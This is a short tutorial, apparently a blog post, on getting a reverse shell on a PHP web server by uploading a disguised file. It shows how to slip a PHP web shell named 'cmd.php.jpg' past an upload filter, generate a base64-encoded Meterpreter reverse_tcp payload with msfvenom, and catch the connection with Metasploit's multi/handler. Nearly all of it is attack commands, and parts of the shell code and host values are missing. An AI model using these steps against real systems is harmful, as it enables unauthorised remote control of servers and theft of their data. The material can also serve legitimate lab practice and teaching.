Metasploit, Reverse shell

Before we start

– only for educational purpose

What you need

  • Target machine ( with php app where you can upload file
  • Kali linux machine (


To start play with Reverse shell and metasploit you have to have app where you have possibility to upload php file or php.jpg file :D.

How to test

Try to upload simple php file, if you will meet any problem please play with extension or content type.

Test file

Content-Disposition: form-data; name="file"; filename="cmd.php.jpg"
Content-Type: application/x-php

	if(isset($_GET['cmd'])) {
		echo "<pre>";
		echo "</pre>";
		echo "lol";


You have to confirms that file was uploaded and you can execute it, for example by visiting url -la

Metasploit / Kali & Update

I tested this on metasploit v4.16.21-dev, if your version is outdated, consider update

apt update; apt install metasploit-framework

generate exploit

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -e php/base64 -f raw > msfvenom2.php.jpg

Important you have to edit ‘msfvenom2.php.jpg’ and wrap payload by

<?php ... ?>

if you are ready please upload this file to server

Hammer time

in msf console, type

msf > 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

and visit this page:
bumm, now you should have Reverse shell, type something in msf console like “ls” or “pwd” to have more options type “shell”